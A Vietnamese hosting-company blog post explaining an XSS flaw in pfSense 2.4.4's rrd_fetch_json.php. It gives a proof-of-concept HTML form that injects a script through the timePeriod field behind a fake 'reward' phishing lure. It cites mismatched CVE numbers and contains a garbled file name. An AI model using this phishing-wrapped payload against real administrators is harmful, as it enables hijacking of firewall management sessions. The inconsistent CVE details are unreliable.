[CVE-2019-12949] Khai thác lỗ hổng XSS trong pfSense 2.4.4

30/12/2020

Mô tả

Trong phiên bản pfSense 2.4.4 kẻ tấn công có thể thực hiện bất kì command nào với quyền root của hệ thống thông qua lỗ hổng XSS trong ding_command.phprrd_fetch_json.php

Mức độ ảnh hưởng

Nếu quản trị viên để lộ thông tin quản trị web bằng cách đặt mật khẩu yếu hay click vào button của các phishing pages, vv… sẽ bị kẻ tấn sau khi xác thực được vào web quản trị sẽ thực hiện khai thác XSS.

Xem thêm tại tại https://www.cvedetails.com/cve/CVE-2019-12347/

PoC XSS

Đường dẫn bị kẻ tấn công khai thác

https://[pfSense_IP_Address]/rrd_fetch_json.php

Gửi một POST request tới đường đẫn trên

<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post"> 	<input type="hidden" name="left" value="system-processor"><br> 	<input type="hidden" name="right" value="null"><br> 	<input type="hidden" name="start" value=""><br> 	<input type="hidden" name="end" value=""><br> 	<input type="hidden" name="resolution" value="300"><br> 	<input type="hidden" name="timePeriod" value="i3i3j<script>alert(1)</script>tz9b1"><br> 	<input type="hidden" name="graphtype" value="line"><br> 	<input type="hidden" name="invert" value="true"><br> 	<input type="hidden" name="refreshInterval" value="0">   <h1>Congratulations on receiving the reward from us</h1>   <h1>Click to receive gifts</h1>   <input type="submit" value="Submit"> </form>

Kết quả trên trang web sẽ xuất hiện một alert như sau

Như vậy nếu người quản trị để lộ thông tin quản trị web sẽ dễ bị kẻ tấn công khai thác lỗ hổng này sau đó thực hiện remote command execution với quyền root của hệ thống.

Link tham khảo

ONET IDC thành lập vào năm 2012, là công ty chuyên nghiệp tại Việt Nam trong lĩnh vực cung cấp dịch vụ Hosting, VPS, máy chủ vật lý, dịch vụ Firewall Anti DDoS, SSL… Với 10 năm xây dựng và phát triển, ứng dụng nhiều công nghệ hiện đại, ONET IDC đã giúp hàng ngàn khách hàng tin tưởng lựa chọn, mang lại sự ổn định tuyệt đối cho website của khách hàng để thúc đẩy việc kinh doanh đạt được hiệu quả và thành công.
Bài viết liên quan

Firewall [ Phần 2 ] Firewalld Service

Firewalld là gì? FirewallD là giải pháp tường lửa mạnh mẽ, toàn diện được cài đặt mặc định...
30/12/2020

Tìm hiểu về Cron và cách sử dụng

Bạn đã từng lên thời gian biểu cho chính bạn chưa? Cách hoạt động của thời gian biểu cũng...
30/12/2020

Hướng dẫn sử dụng NRPE của nagios để giám sát một máy linux

Để có thể giám sát một máy chủ từ xa với nagios, Ta có thể sử dụng nhiều loại plugins khác...
30/12/2020
Bài Viết

Bài Viết Mới Cập Nhật

Huớng dẫn dùng proxy cho ios, iphone 2023
23/09/2023

Cách gắn set proxy cho điện thoại android, oppo, giả lập android, Ldplayer Bằng Proxydroid
20/09/2023

Mua Proxy Socks5 VN Chơi Game Gia Lập Tăng Cường Trải Nghiệm Chơi Game
22/06/2023

Mua Proxy Mỹ, Us Nuôi Tài Khoản Etsy, eBay Tìm Hiểu Về Mua Proxy Mỹ tại Onet.com.vn
22/06/2023

Mua Proxy Game – Giải pháp tuyệt vời cho việc chơi game trên mạng mà không bị giới hạn về vị trí địa lý
03/06/2023